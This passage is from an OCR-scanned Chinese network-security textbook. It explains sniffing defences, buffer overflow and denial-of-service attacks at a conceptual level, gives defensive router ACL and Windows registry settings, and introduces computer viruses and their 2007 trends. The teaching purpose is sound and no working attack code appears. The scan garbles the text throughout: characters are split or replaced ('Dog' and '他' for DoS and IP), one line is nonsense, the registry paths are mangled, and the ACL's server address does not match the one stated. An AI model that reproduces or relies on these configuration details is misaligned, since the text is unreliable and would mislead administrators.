常 是 共享 式 集线器 。 这 样 ， 当 用 户 与 主机 进行 数据 通信 时 ， 两 台 计 算 机 之 间 的 数据 包 ( 称 为 
单 播 包 Unicast Packeb 还 是 会 被 同一 台 集 线 器 上 的 其 他 用 户 所 监听 。 因此, 应 该 以 交换 式 集 
线 器 代替 共享 式 集线器 ， 使 单 播 包 仅 在 两 个 节点 之 间 传 送 ， 从 而 防止 非法 监听 。 当 然 ， 交 
换 式 集线器 只 能 控制 单 播 包 而 无 法 控制 广播 包 (Broadcast PackeD 和 多 播 包 (Multicast 
Packet)。 但 广播 包 和 多 播 包 内 的 关键 信息 ， 要 远 远 少 于 单 播 包 。 

3) ”使 用 加 密 技术 

数据 经 过 加 密 后 ， 通 过 监听 仍然 可 以 得 到 传送 的 信息 ， 但 显示 的 是 乱码 。 使 用 加 密 技 
术 的 缺点 是 影响 数据 传输 速度 以 及 使 用 一 个 弱 加 密 术 比较 容易 被 攻破 。 系 统管 理 员 和 用 户 
需要 在 网 络 速度 和 安全 性 上 进行 折 中 选择 。 

4) 划分 VLAN 

运用 VLAN( 虚 拟 局 域 网 ) 技 术 ， 将 以 太 网 通信 变 为 点 到 点 通信 ， 可 以 防止 大 部 分 基于 
网 络 监听 的 入 侵 。 


3.6 缓冲 区 溢出 


3.6.1 原理 
缓冲 区 是 内 存 中 存放 数据 的 地 方 。 在 程序 试图 将 数据 放 到 计算 机 内 存 中 的 某 一 个 位 置 
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的 时 候 ， 因 为 没有 足够 的 空间 就 会 发 生 缓冲 区 溢出 。 而 人 为 的 溢出 则 是 有 一 定 企图 的 ， 攻 
击 者 写 一 个 超过 缓冲 区 长 度 的 字符 串 ， 植 入 到 缓冲 区 ， 然 后 再 向 一 个 有 限 空间 的 缓冲 区 中 
植 入 该 超 长 的 字符 串 ， 这 时 可 能 会 出 现 两 个 结果 : 一 是 过 长 的 字符 串 覆 盖 了 相 邻 的 存储 单 
元 ， 引 起 程序 运行 失败 ， 严 重 的 可 导致 系统 崩溃 ; 另 一 个 结果 就 是 利用 这 种 漏洞 可 以 执行 
任意 指令 ， 甚 至 可 以 取得 系统 管理 员 权 限 。 

缓冲 区 是 程序 运行 的 时 候 计算 机 内 存 中 的 一 个 连续 块 ， 它 保存 了 给 定 类 型 的 数据 ， 随 
着 动态 分 配 变量 会 出 现 问题 。 大 多 数 时 候 为 了 不 占用 太 多 的 内 存 ， 一 个 有 动态 分 配 变量 的 
程序 在 运行 时 才 决 定 给 它 分 配 多 少 内 存 。 如 果 程序 在 动态 分 配 缓冲 区 放 入 超 长 的 数据 ， 它 
就 会 溢出 。 一 个 缓冲 区 溢出 程序 使 用 这 个 溢出 的 数据 将 汇编 语言 代码 放 到 计算 机 的 内 存 里 ， 
通常 是 产生 管理 员 权 限 的 地 方 。 仅 仅 单个 的 缓冲 区 溢出 并 不 是 问题 的 根本 所 在 。 但 如 果 洲 
出 能 够 送 到 以 管理 员 权限 运行 命令 的 区 域 ， 一 旦 运行 这 些 命令 ， 产 生 溢出 的 计算 机 将 会 完 
全 被 控制 。 造 成 缓冲 区 溢出 的 原因 是 程序 中 没有 仔细 检查 用 户 输入 的 参数 。 
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缓冲 区 溢出 漏洞 可 以 使 任何 一 个 有 黑客 技术 的 人 取得 计算 机 的 控制 权 甚至 是 最 高 权 
限 。 黑 客 要 达到 目的 通常 要 完成 两 个 任务 ， 一 是 在 程序 的 地 址 空间 里 安排 适当 的 代码 ， 二 
是 通过 适当 的 初始 化 寄存 器 和 存储 器 ， 让 程序 跳 转 到 安排 好 的 地 址 空间 执行 。 

1. 在 程序 的 地 址 空间 里 安排 适当 的 代码 

在 程序 的 地 址 空间 里 安排 适当 的 代码 往往 是 相对 简单 的 。 如 果 要 攻击 的 代码 在 所 攻击 
程序 中 已 经 存在 了 ， 那 么 就 简单 地 对 代码 传递 一 些 参数 ， 然 后 使 程序 跳 转 到 目标 空间 就 可 
以 完成 了 。 

2， 控 制程 序 转移 到 攻击 代码 的 形式 

缓冲 区 溢出 漏洞 攻击 都 是 在 寻求 改变 程序 的 执行 流程 ， 使 它 跳 转 到 攻击 代码 ， 最 为 基 
本 的 就 是 溢出 一 个 没有 检查 或 者 有 其 他 漏洞 的 缓冲 区 ， 这 样 做 就 会 扰乱 程序 的 正常 执行 次 
序 。 通 过 溢出 某 缓冲 区 ， 可 以 改写 相近 程序 的 空间 而 直接 跳 过 系统 对 身份 的 验证 。 原 则 上 
来 讲 攻击 时 所 针对 的 缓冲 区 溢出 的 程序 空间 可 为 任意 空间 。 

3. 植 入 综合 代码 和 流程 控制 


常见 的 溢出 缓冲 区 攻击 类 是 在 一 个 字符 串 中 综合 了 代码 植 入 和 Activation Records。 攻 
击 时 定位 在 一 个 可 供 溢出 的 自动 变量 ， 然 后 向 程序 传递 一 个 很 大 的 字符 串 ， 在 引发 缓冲 区 
溢出 改变 Activation Records 的 同时 植 入 代码 。 植 入 代码 和 缓冲 区 溢出 不 一 定 要 一 次 性 完成 
可 以 在 一 个 缓冲 区 内 放置 代码 (这 个 时 候 并 不 能 溢出 缓冲 区 )， 然 后 通过 溢出 另 一 个 缓冲 
来 转移 程序 的 指针 。 这 样 的 方法 一 般 是 用 于 可 供 溢出 的 缓冲 区 不 能 放 入 全 部 代码 时 。 


3.6.3 检测 和 防护 
目前 有 四 种 基本 的 方法 保护 缓冲 区 免 受 缓冲 区 溢出 的 攻击 和 影响 。 
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1. 强制 写 正确 的 代码 的 方法 

编写 正确 的 代码 是 一 件 非 常 有 意义 但 耗 时 的 工作 ， 特 别 像 编写 C 语言 那 种 具有 容易 出 
错 倾 向 的 程序 (如 字符 串 的 零 结尾 )， 这 种 风格 是 由 于 追求 性 能 而 忽视 正确 性 的 传统 引起 的 。 

2. 通过 操作 系统 使 得 缓冲 区 不 可 执行 ， 从 而 阻止 攻击 者 植 入 攻击 代码 


这 种 方法 有 效 地 阻止 了 很 多 缓冲 区 溢出 的 攻击 ， 但 是 攻击 者 并 不 一 定 要 植 入 攻击 代码 
来 实现 缓冲 区 溢出 的 攻击 ， 所 以 这 种 方法 仍 存在 很 多 弱点 。 


3. 利用 编译 器 的 边界 检查 来 实现 缓冲 区 的 保护 

这 个 方法 使 得 缓冲 区 溢出 不 可 能 出 现 ， 从 而 完全 消除 了 缓冲 区 溢出 的 威胁 ， 但 是 相对 
而 言 代 价 比较 大 。 

4. 在 程序 指针 失效 前 进行 完整 性 检查 

虽然 这 种 方法 不 能 使 得 所 有 的 缓冲 区 溢出 失效 ， 但 它 的 确 阻 止 了 绝 大 多 数 的 缓冲 区 涪 
出 攻击 ， 而 且 能 够 逃脱 这 种 方法 保护 的 缓冲 区 溢出 攻击 也 很 难 实现 。 

最 普通 的 缓冲 区 溢出 形式 是 攻击 活动 记录 ， 然 后 在 堆栈 中 植 入 代码 。 这 种 类 型 的 攻击 
在 1996 年 中 有 很 多 记录 ， 非 执行 堆栈 和 堆栈 保护 的 方法 都 可 以 有 效 防卫 这 种 攻击 。 


3.7 ”拒绝 服务 攻击 


3.7.1 原理 


拒绝 服务 攻击 ， 又 称 为 DoS(Denial of Service 的 缩写 ) 攻 击 。DoS 的 攻击 方式 有 很 多 种 ， 
最 基本 的 DoS 攻击 就 是 利用 合理 的 服务 请 求 来 占用 过 多 的 服务 资源 ， 从 而 使 合法 用 户 无 法 
得 到 服务 响应 。 单 一 的 Dog 攻击 一 般 是 采用 一 对 一 方式 ， 当 攻击 目标 CPU 速度 低 、 内 存 
小 或 者 网 络 带宽 小 等 各 项 性 能 指标 不 高 时 ， 它 的 效果 是 明显 的 。 随 着 计算 机 与 网 络 技术 的 
发 展 ， 计 算 机 的 处 理 能 力 迅 速 增长 ， 内 存 大 大 增加 ， 同 时 也 出 现 了 千 兆 级 别 的 网 络 ， 这 使 
得 DoS 攻击 的 困难 程度 加 大 了 , 同时 被 攻击 目标 对 恶意 攻击 包 的 “消化 能 力 ” 加 强 了 不 少 ， 
例如 你 的 攻击 软件 每 秒 钟 可 以 发 送 3000 个 攻击 包 , 但 我 的 主机 与 网 络 带 宽 每 秒 钟 可 以 处 理 
10000 个 攻击 包 ， 这 样 攻击 就 不 会 产生 什么 效果 。 这 时 就 出 现 了 分 布 式 拒绝 服务 攻击 ， 又 
称 为 DDoS(Distributed Denial of Service) 攻 击 ， 简 单 的 DoS 攻击 是 一 对 一 的 方式 进行 的 ， 
DDoS 攻击 是 采取 增加 计算 机 同时 攻击 一 台 目 标 计算 机 ， 从 而 达到 攻击 的 目的 。 


3.7.2 方法 (或 工具 ) 
1. SYN Flood 


这 种 方法 利用 对 服务 器 的 连接 进入 缓冲 区 (Backlog Queue)， 通 过 利用 特殊 的 程序 ， 设 
置 TCP 的 Header， 向 服务 器 端 不 断 地 成 倍 发 送 只 有 SYN 标志 的 TCP 连接 请 求 ， 当 服务 器 
接收 的 时 候 ， 都 认为 是 没有 建立 起 来 的 连接 请 求 ， 于 是 为 这 些 请 求 建立 会 话 ， 排 到 缓冲 区 
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队列 中 。 

如 果 攻 击 者 的 SYN 请 求 超过 了 服务 器 能 容纳 的 限度 ， 使 得 缓冲 区 队列 满 ， 那么 服务 器 
就 不 再 接收 新 的 请 求 了 , 同时 其 他 合法 用 户 的 连接 都 被 拒绝 掉 。 攻 击 者 持续 发 送 SYN 请 求 ， 
直到 缓冲 区 中 都 是 攻击 者 发 送 的 SYN 请 求 。 

2.IP 欺骗 DoS 攻击 


这 种 攻击 利用 RST 位 来 实现 。 假 设 现在 有 一 个 合法 用 户 (1.1.1.1) 已 经 同 服务 器 建立 了 
正常 的 连接 ， 攻 击 者 构造 攻击 的 TCP 数据 ， 伪 装 自己 的 下 为 1.1.1.1， 并 向 服务 器 发 送 一 
个 带 有 RST 位 的 TCP 数据 段 。 服 务 器 接收 到 这 样 的 数据 后 ， 认 为 从 1.1.1.1 发 送 的 连接 有 
错误 ， 就 会 清空 缓冲 区 中 建立 好 的 连接 。 这 时 ， 如 果 合 法 用 户 1.1.1.1 再 发 送 合法 数据 ， 服 
务 器 就 已 经 没有 这 样 的 连接 了 ， 该 用 户 就 必须 重新 开始 建立 连接 。 

进行 这 种 攻击 时 ， 攻 击 者 会 伪造 大 量 的 IP 地 址 ， 向 目标 发 送 RST 数据 ， 使 服务 器 不 
对 合法 用 户 服 务 。 

3. 带宽 DoS 攻击 


如 果 攻 击 者 的 连接 带宽 足够 大 而 服务 器 又 不 是 很 大 ， 攻 击 者 可 以 发 送 请 求 来 消耗 服务 
器 的 缓冲 区 ， 同 时 消耗 服务 器 的 带宽 。 


3.7.3 检测 和 防护 

1. 检测 拒绝 服务 攻击 

在 服务 器 上 可 以 通过 CPU 使 用 率 和 内 存 利用 率 简单 有 效 地 查看 服务 器 当前 的 负载 情 
况 ， 如 果 发 现 服务 器 突然 超 负载 运行 ， 性 能 突然 降低 ， 这 就 有 可 能 是 受 攻击 的 征兆 。 不 过 
也 可 能 是 正常 访问 网 站 人 数 增加 的 原因 。 按 照 下 面 两 个 原则 即 可 确定 受到 了 攻击 。 

(1) 网 站 的 数据 流量 突然 超出 平常 的 十 几 倍 甚至 上 百倍 ， 而 且 同时 到 达 网 站 的 数据 包 
分 别 来 自 大 量 不 同 的 他 。 

(2) 大 量 到 达 的 数据 包 (包括 TCP 包 和 UDP 包 ) 并 不 是 网 站 服务 连接 的 一 部 分 , 往往 指 
向 计算 机 的 任意 端口 。 比 如 你 的 网 站 是 Web 服务 器 , 而 数据 包 却 发 向 你 的 FTP 端口 或 其 他 
任意 的 端口 。 

2. BAN IP 地 址 法 防护 


确定 自己 受到 攻击 后 就 可 以 使 用 简单 的 屏蔽 了 P 的 方法 将 Dos 攻击 化 解 。 对 于 DoS 攻 
击 来 说 这 种 方法 非常 有 效 , 因为 Dos 往往 来 自 少量 人 地 址 ,而 且 这 些 人 P 地 址 都 是 虚构 的 、 
伪装 的 。 在 服务 器 或 路 由 器 上 屏蔽 攻击 者 IP 后 就 可 以 有 效 的 防范 Dog 的 攻击 。 不 过 对 于 
DDoS 来 说 则 比较 麻烦 ， 需 要 我 们 对 人 P 地 址 分 析 ， 将 真正 攻击 的 瑟 地 址 屏蔽 。 

不 论 是 对 付 DoS 还 是 DDoS 都 需要 在 服务 器 上 安装 相应 的 防火 堵 ， 然 后 根据 防火 墙 的 
日 志 分 析 来 访 者 的 王 , 发 现 访问 量 大 的 异常 人 P 段 就 可 以 添加 相应 的 规则 到 防火 墙 中 实施 过 
滤 了 。 

直接 在 服务 器 上 过 滤 会 耗费 服务 器 的 一 定 系统 资源 ， 比 较 有 效 的 方法 是 在 服务 器 上 通 
过 防火 墙 日 志 定 位 非法 他 段 , 然后 将 过 滤 条 目 添加 到 路 由 器 上 。 例如 发 现 进行 DDoS 攻击 
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的 非法 他 段 为 211.153.0.0 255.255.0.0， 服 务 器 的 地 址 为 61.153.5.1。 可 以 登录 公司 核心 路 
由 器 添加 如 下 语句 的 访问 控制 列表 进行 过 滤 。 

Access-list 108 deny tcp 211.153.0.0 0.0.255.255 61.135.5.1 0.0.0.0， 这 样 就 实现 了 将 
211.153.0.0 255.255.0.0 的 非法 他 过 滤 的 目的 。 


3. 增加 SYN 缓存 法 防护 


上 面 提 到 的 BAN 卫 法 虽然 可 以 有 效 地 防止 DoS 与 DDoS 的 攻击 ， 但 由 于 使 用 了 屏蔽 
了 人 P 功能 ， 自 然 会 误 将 某 些 正常 访问 的 他 也 过 滤 掉 。 所 以 在 遇 到 小 型 攻击 时 不 建议 大 家 使 用 
上 面 介绍 的 BAN IP 法 ,我 们 可 以 通过 修改 SYN 缓存 的 方法 防御 小 型 Dos 与 DDoS 的 攻击 。 

1) ”Windows Server 2003 中 的 修改 方法 

修改 SYN 缓存 大 小 是 通过 修改 注册 表 的 相关 键 值 完 成 的 ， 在 Windows Server 2003 中 
的 修改 方法 如 下 。 

(1) 选择 “开始 ”|“ 运 行 ”命令 ， 在 打开 的 对 话 框 中 输入 regedit 命令 ， 进 入 注册 表 编 
辑 器 。 

(2) 找到 HKEY_ LOCAL MACHINE\SYSTEM\CurrentControlSet\Services, 在 其 下 有 个 
SynAttackProtect 键 值 ， 默 认为 0， 将 其 修改 为 1， 可 更 有 效 地 防御 SYN 攻击 。 

(3) 将 HRKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services 下 的 Enable- 
DeadGWDetect 键 值 修改 为 0。 该 设置 将 禁止 SYN 攻击 服务 器 后 ， 强 迫 服务 器 修改 网 关 ， 
从 而 使 服务 暂停 。 

(4) 将 HRKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services 下 的 Enable. 
PMTUDiscovery 键 值 , 修改 为 0。 这样 可 以 限定 攻击 者 的 MTU 大 小 , 降低 服务 器 总 体 负 人 荷 。 

(5) 将 HREY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services 下 KeepAlive- 
Time 设置 为 300000， 将 NoNameReleaseOnDemand 设置 为 1。 

2) ”Windows 2000 Server 中 的 修改 方法 
在 Windows 2000 Server 下 拒绝 访问 攻击 的 防范 方法 和 Windows Server 2003 基本 相似 ， 
只 是 在 设置 数值 上 有 些 区 别 。 简 单 介绍 如 下 。 

(1) 将 SynAttackProtect 设置 为 2。 

(2) 将 EnableDeadGWDetect 设置 为 0。 

(3) 将 EnablePMTUDiscovery 设置 为 0。 

(4) 将 KeepAliveTime 设置 为 300000。 

(5) 将 NoNameReleaseOnDemand 设置 为 1。 


第 4 章 病毒 分 析 与 防御 


@ ”计算 机 病毒 的 概念 、 特 点 、 分 类 及 发 展 趋势 
日 ”各 种 常见 病毒 的 特点 、 分 析 及 防 得 
日 ”主流 反 病 毒 产品 的 特点 、 信 息 安全 体系 的 构成 


4.1 认识 计算 机 病毒 


4.1.1 计算 机 病毒 的 概念 


20 世纪 60 年 代 初 ， 美 国 贝 尔 实验 室 进行 了 一 个 名 为 “ 磁 芯 大 战 ” 的 游戏 ， 游 戏 中 通 
过 复制 自身 来 摆脱 对 方 的 控制 ， 这 就 是 所 谓 “ 病 毒 ”的 第 一 个 雏形 。 

20 世纪 70 年 代 ， 美 国 作家 雷 恩 在 其 出 版 的 《P1 的 青春 》 一 书 中 构思 了 一 种 能 够 自我 
复制 的 计算 机 程序 ， 并 第 一 次 称 为 “计算 机 病毒 ” 

1983 年 11 月 ， 在 国际 计算 机 安全 学 术 研讨 会 上 ， 美 国 计 算 机 专家 首次 将 病毒 程序 在 
VAX/750 计算 机 上 进行 了 实验 ， 世 界 上 第 一 个 计算 机 病毒 就 这 样 在 实验 室 中 产生 了 。 

20 世纪 80 年 代 后 期 ， 巴 基 斯 坦 有 两 个 以 编程 为 生 的 兄弟 ， 他 们 为 了 打击 那些 盗版 软 
件 的 使 用 者 ， 设 计 出 了 一 个 名 为 “巴基斯坦 智 赛 ”的 病毒 ， 这 就 是 在 世界 上 流行 的 第 一 个 
真正 的 病毒 。 

那么 ， 究 竟 什 么 是 计算 机 病毒 呢 ? 

1994 年 2 月 18 日 ， 我 国正 式 颁布 实施 了 《中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 
条 例 》， 在 该 条 例 的 第 二 十 八条 中 明确 指出 : “计算 机 病毒 ， 是 指 编制 或 者 在 计算 机 程序 
中 插入 的 破坏 计算 机 功能 或 者 毁坏 数据 ， 影 响 计 算 机 使 用 ， 并 能 自我 复制 的 一 组 计算 机 指 
令 或 者 程序 代码 。” 

这 个 定义 具有 法 律 性 、 权 威 性 。 根 据 这 个 定义 ， 计 算 机 病毒 是 一 种 计算 机 程序 ， 它 不 
仅 能 破坏 计算 机 系统 ， 而 且 还 能 够 传染 到 其 他 系统 。 

计算 机 病毒 不 是 天 然 存在 的 ， 是 某 些 人 利用 计算 机 软 、 硬 件 所 固有 的 脆弱 性 ， 编 制 的 
具有 破坏 功能 的 程序 。 计 算 机 病毒 能 通过 某 种 途径 潜伏 在 计算 机 的 存储 介质 (或 程序 ) 里 ， 
当 达 到 某 种 条 件 时 即 被 激活 ， 然 后 用 修改 其 他 程序 的 方法 将 自己 的 精确 副本 或 者 可 能 演化 
的 形式 放 入 其 他 程序 中 ， 从 而 感染 它们 ， 对 计算 机 资源 进行 破坏 。 


4.1.2 计算 机 病毒 的 分 类 
传统 意义 上 的 计算 机 病毒 一 般 具 有 以 下 几 个 特点 。 
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1. 破坏 性 


凡是 以 软件 手段 能 触及 计算 机 资源 的 地 方 均 可 能 受到 计算 机 病毒 的 破坏 。 任 何 病毒 只 
要 侵入 系统 ， 都 会 对 系统 及 应 用 程序 产生 不 同 程度 的 影响 ， 轻 者 会 降低 计算 机 工作 效率 ， 
占用 系统 资源 ， 重 者 可 导致 系统 崩溃 。 

根据 病毒 对 计算 机 系统 造成 破坏 的 程度 ， 我 们 可 以 把 病毒 分 为 良性 病毒 与 恶性 病毒 。 
良性 病毒 可 能 只 是 干扰 显示 屏幕 ， 显 示 一 些 乱码 或 无 聊 的 语句 ， 或 者 根本 没有 任何 破坏 动 
作 ， 只 是 占用 系统 资源 ， 这 类 病毒 较 多 ， 如 GENP、 小 球 、W-BOOT 等 。 恶 性 病毒 则 有 明 
确 的 目的 ， 它 们 破坏 数据 、 删 除 文件 、 加 密 磁 盘 甚至 格式 化 磁盘 ， 对 数据 造成 不 可 挽回 的 
破坏 ， 这 类 病毒 有 CIH、 红 色 代码 等 。 


2. 隐蔽 性 


病毒 程序 大 多 夹 在 正常 程序 之 中 ， 很 难 被 发 现 ， 它 们 通常 附 在 正常 程序 或 磁盘 较 隐 巩 
的 地 方 (也 有 个 别 的 以 隐 含 文件 形式 出 现 )， 这 样 做 的 目的 是 不 让 用 户 发 现 它 的 存在 。 如 果 
不 经 过 代码 分 析 ， 我 们 很 难 区 别 病毒 程序 与 正常 程序 。 一 般 在 没有 防护 措施 的 情况 下 ， 计 
算 机 病毒 程序 取得 系统 控制 权 后 ， 可 以 在 很 短 的 时 间 里 传染 大 量程 序 。 而 且 受 到 传染 后 ， 
计算 机 系统 通常 仍 能 正常 运行 ， 用 户 不 会 感到 有 任何 异常 。 

大 部 分 病毒 程序 具有 很 高 的 程序 设计 技巧 ， 代 码 短小 精怪 ， 其 目的 就 是 为 了 隐蔽 。 病 
毒 程序 一 般 只 有 几 百 字 节 ， 而 PC 机 对 文件 的 存 取 速 度 可 达 每 秒 几 十 万 字 节 以 上 ， 所 以 病 
毒 程序 在 转瞬 之 问 便 可 将 这 短 短 的 几 百 字 节 附 着 到 正常 程序 之 中 ， 而 不 被 察觉 。 

3. 潜伏 性 

大 部 分 计算 机 病毒 感染 系统 之 后 不 会 马上 发 作 ， 可 长 期 隐藏 在 系统 中 ， 只 有 在 满足 特 
定 条 件 时 才 启 动 其 破坏 模块 。 例如 ,PETER-2 病毒 在 每 年 的 2 月 27 日 会 提 三 个 问题 ， 答 错 
后 会 将 硬盘 加 密 。 著 名 的 “黑色 星期 五 ”病毒 在 着 13 日 的 星期 五 改作。 当然 ， 最 令 人 难忘 
的 是 26 日 发 作 的 CIH 病毒 。 这 些 病毒 平时 隐藏 得 很 好 ， 只 有 在 发 作 日 才 会 显示 其 破坏 的 
本 性 。 

4. 传染 性 

计算 机 病毒 的 传染 性 是 指 病毒 具有 把 自身 复制 到 其 他 程序 中 的 特性 。 计 算 机 病毒 是 一 
段 人 为 编制 的 计算 机 程序 代码 ， 这 段 程序 代码 一 旦 进入 计算 机 并 得 以 执行 ， 它 会 搜寻 其 他 
符合 其 传染 条 件 的 程序 或 存储 介质 ， 确 定 目标 后 将 自身 代码 插入 其 中 ， 达 到 自我 繁殖 的 目 
的 。 只 要 一 台 计 算 机 染 毒 ， 未 得 到 及 时 处 理 ， 那 么 病毒 会 在 这 台 计 算 机 上 迅速 扩散 ， 感 染 
其 中 的 大 量 文件 (一 般 是 可 执行 文件 )。 而 被 感染 的 文件 又 成 了 新 的 传染 源 ， 在 与 其 他 计算 
机 进行 数据 交换 或 通过 网 络 接触 时 ， 使 得 在 整个 网 络 中 继续 传播 。 

正常 的 计算 机 程序 是 不 会 将 自身 的 代码 强行 连接 到 其 他 程序 之 上 的 ， 而 病毒 程序 却 能 
使 自身 的 代码 强行 传染 到 一 切 符合 其 传染 条 件 的 未 受到 传染 的 程序 之 上 。 因 此 是 否 具 有 传 
染 性 是 判别 一 个 程序 是 否 为 计算 机 病毒 的 最 重要 条 件 。 

通常 ， 计 算 机 病毒 可 分 为 下 列 几 类 。 
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(> 网 络 安全 管理 与 维护 


潼 汀 车 拆 半 ”全 问 民 如上 村 才 到 沼 到 


1) “文件 型 病毒 

文件 型 病毒 通过 在 执行 过 程 中 插入 指令 ， 把 自己 依附 在 可 执行 文件 上 ， 并 利用 这 些 指 
令 来 调用 附 在 文件 中 某 处 的 病毒 代码 。 当 文件 执行 时 ， 病 毒 会 调 出 病毒 代码 来 执行 ， 接 着 
又 返回 到 正常 的 执行 指令 序列 。 通 常 ， 这 个 执行 过 程 发 生得 很 快 ， 以 至 于 用 户 并 不 知道 病 
毒 代码 已 被 执行 。 

2) “引导 扇 区 病毒 

引导 扇 区 病毒 改变 每 一 个 用 DOS 格式 来 格式 化 的 磁盘 的 第 一 个 肩 区 里 的 程序 .通常 引 
导 扇 区 病毒 先 执行 自身 的 代码 ， 再 继续 PC 机 的 启动 进程 。 大 多 数 情况 ， 在 一 台 染 有 引导 
型 病毒 的 计算 机 上 对 可 读 写 的 软盘 进行 读 写 操作 时 ， 这 块 软盘 也 会 感染 该 病毒 。 引 导 扇 区 
病毒 会 潜伏 在 软盘 的 引导 扇 区 里 或 者 在 硬盘 的 引导 扇 区 或 在 主 引导 记录 中 插入 指令 。 如 果 
计算 机 从 被 感染 的 软盘 引导 时 ， 病 毒 就 会 感染 到 引导 硬盘 ， 并 把 自己 的 代码 调 入 内 存 。 触 
发 引导 区 病毒 的 典型 事件 是 系统 日 期 和 时 间 。 

3) ”混合 型 病毒 

混合 型 病毒 有 文件 型 和 引导 扇 区 型 两 类 病毒 的 某 些 共同 特性 。 当 执行 一 个 被 感染 的 文 
件 时 ， 它 将 感染 硬盘 的 引导 扇 区 或 主 引导 记录 ， 并 且 感 染 在 计算 机 上 使 用 过 的 软盘 。 这 种 
病毒 能 感染 可 执行 文件 ， 从 而 能 在 网 上 迅速 传播 蔓延 。 

4) ”变形 病毒 

变形 病毒 是 一 种 能 变异 的 病毒 ， 随 着 感染 时 间 的 不 同 而 改变 其 形式 ， 不 同 的 感染 操作 
也 会 使 病毒 在 文件 中 以 不 同 的 方式 出 现 ， 使 传统 的 模式 匹配 法 杀毒 软件 对 这 种 病毒 显得 软 
弱 无 力 。 

5) ” 宏 病 毒 

宏 病毒 不 只 是 感染 可 执行 文件 ， 它 还 可 以 感染 一 般 软 件 文件 。 虽 然 宏 病毒 不 会 对 计算 
机 系统 造成 严重 的 危害 ， 但 仍 令 人 讨厌 。 因 为 宏 病毒 会 影响 系统 的 性 能 以 及 用 户 的 工作 效 
率 。 安 病毒 是 利用 宏 语言 编写 的 ， 不 受 操作 平台 的 约束 ， 可 以 在 DOS、Windows、UNIX 
甚至 在 OS/2 系统 中 散播 。 这 就 是 说 ， 宏 病毒 能 被 传播 到 任何 可 运行 编写 宏 病毒 的 应 用 程序 
的 计算 机 中 。 


4.1.3 计算 机 病毒 的 发 展 趋势 


2007 年 ， 随 着 互联 网 迅猛 发 展 ， 网 络 应 用 日 益 广泛 与 深入 ， 网 络 炒股 、 网 络 游戏 、 网 
银 用 户 大 幅 增 长 ， 与 此 同时 病毒 的 “工业 化 ”入 侵 以 及 “流程 化 ”攻击 等 特点 越发 明显 ， 
以 “熊猫 烧香 ”、“ 灰 合子”、AV 终结 者 为 代表 的 恶性 病毒 频繁 出 现 ， 使 广大 用 户 对 互 
联网 安全 问题 的 关注 日 益 增强 。 在 此 我 们 引用 国内 网 络 安全 厂商 一 一 金山 软件 于 2008 年 1 
月 17 日 正式 发 布 的 《2007 年 度 中 国电 脑病 毒 疫情 及 互联 网 安全 报告 》， 给 读者 介绍 一 下 
2007 年 计算 机 病毒 的 特点 以 及 当时 对 2008 年 计算 机 病毒 发 展 的 趋势 预测 。 


1. 2007 年 计算 机 病毒 的 特点 分 析 


1) “2007 年 计算 机 病毒 的 六 大 特点 
(1) 病毒 “工业 化 ”入 侵 凸 显 病毒 经 济 。 
病毒 /木马 背后 所 带 来 的 巨大 的 经 济 利益 催生 了 病毒 “工业 化 ”入 侵 的 进程 。2007 年 上 
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半年 ， 金山 对 外 发 布 了 病毒 /木马 产业 链 的 攻击 特征 , 在 此 阶段 ,病毒 /木马 的 攻击 通常 是 针 
对 单个 计算 机 的 攻击 。 攻 击 的 手法 ， 一 般 利 用 社会 工程 欺骗 的 方式 ， 发 送 经 过 伪装 的 木马 
以 及 通过 网 页 挂 马 构造 大 面积 的 陷阱 。 这 种 攻击 需要 受害 者 “配合 ”， 比 如 需要 用 户 去 浏 


览 相应 网 页 或 接收 和 执行 相应 的 程序 。 


2007 年 下 半年 , 一 种 新 的 病毒 /木马 攻击 手法 被 广泛 应 用 。 攻 击 过 程 完全 由 攻击 者 一 方 
完成 ， 而 且 能 够 获得 很 高 的 成 功率 。 他 们 利用 扫描 器 寻找 开放 端口 的 联网 主机 ， 再 使 用 一 


种 被 称 为 “种 植 者 ”的 黑客 工具 ， 攻 击 存在 漏洞 
限 ， 命 令 远程 主机 下 载 并 执行 恶意 程序 。 


的 计算 机 ， 直 接 获 取 远程 计算 机 的 管理 权 


然而 ， 还 不 仅仅 如 此 ， 一 种 “工业 化 ”的 入 侵 手 段 已 经 在 黑客 圈 广 为 流传 。 攻 击 者 使 


攻击 流程 完全 自动 化 ， 即 扫描 端口 、 远 程 入 侵 、 


下 载 木马 完全 自动 化 ， 抓 取 “ 肉 鸡 ” 效 率 


仅 取 决 于 用 于 发 起 攻击 的 计算 机 性 能 和 网 络 带宽 。 


对 于 攻击 者 来 说 ， 在 互联 网 上 寻找 目标 并 非 难事 


护 措施 的 盗版 XP 系统 ， 因 为 大 量 计算 机 使 用 者 


所 以 很 容易 找到 没有 采取 任何 保 
只 关心 使 用 而 不 关心 安全 。 对 于 这 样 的 系 


统 ， 需 要 安装 网 络 防火 墙 来 应 对 “工业 化 ”的 病毒 攻击 。 


(2) 计算 机 病毒 /木马 传播 的 Web 2.0 化 。 


Web 2.0 给 网 民 带 来 全 新 的 上 网 体验 ，Web 2.0 的 内 容 源 不 再 只 由 少数 专业 人 士 发 布 ， 
任何 人 都 可 以 成 为 内 容 源 的 发 布 者 ， 这 就 为 别有用心 的 攻击 者 提供 了 更 多 的 机 会 一 一 各 种 
恶意 代码 以 热门 事件 为 岂 子 被 传输 到 网 络 上 等 待 被 下 载 。 众 多 BLOG、 论 坛 、 社 区 、 视 频 


网 站 成 为 病毒 泛滥 和 传播 的 温床 。 


Web 2.0 程序 本 身 存在 的 威胁 也 是 新 的 安全 课题 , 安全 厂商 注意 到 myspace 蠕虫 和 百度 
空间 蠕虫 是 新 蠕虫 的 代表 。 跨 站 点 脚本 攻击 ， 变 得 越 来 越 普及 ， 因 为 黑客 们 已 经 发 现 了 这 
类 攻击 的 作用 和 好 处 。 攻 击 者 可 以 在 用 户 毫 不 知情 的 情况 下 进行 操作 ， 其 中 包括 强迫 PC 
下 载 非法 内 容 、 侵 入 其 他 Web 站 点 、 发 送 电子 邮件 等 。 利 用 AJAX， 在 后 台 无 声 无 息 地 传 
递 数据 ， 很 难 被 发 现 ， 为 AJAX 蠕虫 隐身 传播 带 来 了 绝 佳 的 便利 ! 其 中 百度 空间 蠕虫 源码 
已 经 公布 。 对 于 普通 的 计算 机 用 户 来 说 ， 根 本 无 法 从 众多 内 容 源 中 区 分 出 威胁 。 


(3) 黑客 技术 与 病毒 技术 的 广泛 协作 。 


